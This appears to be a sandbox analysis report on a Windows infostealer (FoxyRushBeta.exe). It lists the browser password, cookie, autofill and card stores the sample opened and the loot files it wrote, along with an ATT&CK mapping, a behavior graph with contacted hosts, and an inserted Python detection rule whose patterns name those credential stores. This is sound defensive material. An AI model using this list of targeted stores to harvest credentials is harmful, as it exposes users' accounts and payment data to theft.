Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox\firefoxcookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox\firefoxcookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox\firefoxcookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Firefox\firefoxcookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\579569victims1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords.txt
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cards\Cards.txt
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Directory queried: C:\Users\user\Documents
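The file events above are the classic infostealer pattern: a process running out of the user's Temp directory opens the Chrome, Edge and Firefox credential and cookie stores and then writes Passwords, Cookies, Autofill and Cards text files next to itself. The Python below is an added example, not part of the Joe Sandbox report or of the sample, showing how a detection rule over file-activity telemetry would flag that combination while ignoring a browser opening its own profile. The event record shape, its field names, and the non-report paths (chrome.exe, backup.exe) are assumptions constructed for the example.

```python
"""Flag browser-credential-store access by non-browser processes.

Added example, not from the Joe Sandbox report. Input is a list of
file-activity events of the (assumed) shape
{"image": <process path>, "op": "open" | "create", "path": <file path>}.
"""
import re
from collections import defaultdict

# Secret stores named in the report: Chrome/Edge "Login Data", "Web Data" and
# "Network\Cookies", and Firefox "cookies.sqlite" (plus its -wal/-shm side files).
SECRET_STORE_PATTERNS = [
    re.compile(r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\Login Data$", re.I),
    re.compile(r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\Web Data$", re.I),
    re.compile(r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\Network\\Cookies$", re.I),
    re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite(?:-wal|-shm)?$", re.I),
]

# Loot files the report shows being created: Passwords\Passwords.txt,
# Cookies\Google_Default.txt, Autofill\Autofills.txt, Cards\Cards.txt, Passwords.txt.
LOOT_FILE_PATTERN = re.compile(
    r"\\(?:Passwords|Cookies|Autofill|Cards)\\[^\\]+\.txt$|\\Passwords\.txt$", re.I)

# Browsers legitimately open their own stores; everything else is suspect.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}


def image_name(image_path):
    """Basename of a Windows image path, lower-cased."""
    return image_path.rsplit("\\", 1)[-1].lower()


def detect_credential_theft(events, min_stores=2):
    """Return {image_path: finding} for processes that look like stealers.

    A non-browser process is flagged when it opens at least `min_stores`
    distinct secret stores, or opens any store and also writes a loot file.
    """
    stores_read = defaultdict(set)
    loot_written = defaultdict(set)
    for ev in events:
        if ev["op"] == "open" and any(p.search(ev["path"]) for p in SECRET_STORE_PATTERNS):
            stores_read[ev["image"]].add(ev["path"])
        elif ev["op"] == "create" and LOOT_FILE_PATTERN.search(ev["path"]):
            loot_written[ev["image"]].add(ev["path"])

    findings = {}
    for image in set(stores_read) | set(loot_written):
        if image_name(image) in BROWSER_IMAGES:
            continue  # a browser reading its own profile is expected
        stores = stores_read.get(image, set())
        loot = loot_written.get(image, set())
        if len(stores) >= min_stores or (stores and loot):
            findings[image] = {
                "secret_stores": sorted(stores),
                "loot_files": sorted(loot),
                # Execution from %LOCALAPPDATA%\Temp, as in the report, raises confidence.
                "from_temp": "\\appdata\\local\\temp\\" in image.lower(),
            }
    return findings


# Constructed telemetry modelled on the report's file events (not a real log).
STEALER = r"C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"  # assumed path
BACKUP = r"C:\Program Files\Backup\backup.exe"                     # assumed benign tool
SAMPLE_EVENTS = [
    {"image": STEALER, "op": "open", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": STEALER, "op": "open", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"},
    {"image": STEALER, "op": "open", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"image": STEALER, "op": "open", "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"image": STEALER, "op": "open", "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite"},
    {"image": STEALER, "op": "create", "path": r"C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt"},
    {"image": STEALER, "op": "create", "path": r"C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt"},
    # Benign: the browser itself opens its own store.
    {"image": CHROME, "op": "open", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # Benign: an unrelated tool writes an unrelated text file.
    {"image": BACKUP, "op": "create", "path": r"C:\Users\user\Documents\notes.txt"},
]

if __name__ == "__main__":
    for image, finding in detect_credential_theft(SAMPLE_EVENTS).items():
        print(image, finding)
```

The rule keys on the combination rather than on any single path: a migration or backup tool may legitimately touch one store, and a dropped text file alone means nothing, but one non-browser process doing both (and running from Temp) is worth an alert.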
MITRE ATT&CK Matrix

Each tactic column of the matrix is listed on its own line. A number in parentheses is the count of report signatures mapped to that technique; unnumbered entries are the matrix's placeholder cells, for which no signature fired.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (21); Process Injection (11); DLL Side-Loading (1); Software Packing; Steganography; Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (1); Process Discovery (2); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (12); System Information Discovery (24)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Data from Local System (21); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph

Behavior Graph ID: 1631455  Sample: bkHLzNaNMS.exe  Start date: 07/03/2025  Architecture: WINDOWS  Score: 60
Numbers in square brackets are the per-node counters shown on the graph's process nodes.

Start
  DNS: api.ipify.org
  Signature: Suricata IDS alerts for network traffic
  -> bkHLzNaNMS.exe [279] started
       Dropped: C:\Users\user\AppData\...\FoxyRushBeta.exe (PE32+)
       Dropped: C:\Users\user\AppData\Local\...\nsis7z.dll (PE32)
       Dropped: C:\Users\user\AppData\Local\...\System.dll (PE32)
       Dropped: 12 other files (none is malicious)
       Signature: Drops large PE files
       -> FoxyRushBeta.exe [20] started
            Network: 151.243.200.62, ports 49725, 49729, 80, RASANAIR, Iran (Islamic Republic of)
            Network: api.ipify.org 104.26.13.205, ports 443, 49726, CLOUDFLARENETUS, United States
            Dropped: C:\Users\user\AppData\...\cookies.sqlite-shm (data)
            Dropped: C:\Users\user\AppData\Local\...\Passwords.txt (ASCII)
            Dropped: C:\Users\user\AppData\Local\...\Passwords.txt (ASCII)
            Dropped: 5 other malicious files
            Signature: Tries to harvest and steal browser information (history, passwords, etc)
            Signature: Detected generic credential text file
            -> cmd.exe [1] started -> powershell.exe [15] started; conhost.exe started
            -> cmd.exe [1] started -> powershell.exe [15] started; conhost.exe started
            -> cmd.exe [1] started -> tasklist.exe [1] started; conhost.exe started
            -> 5 other processes started -> tasklist.exe [1] started; conhost.exe started
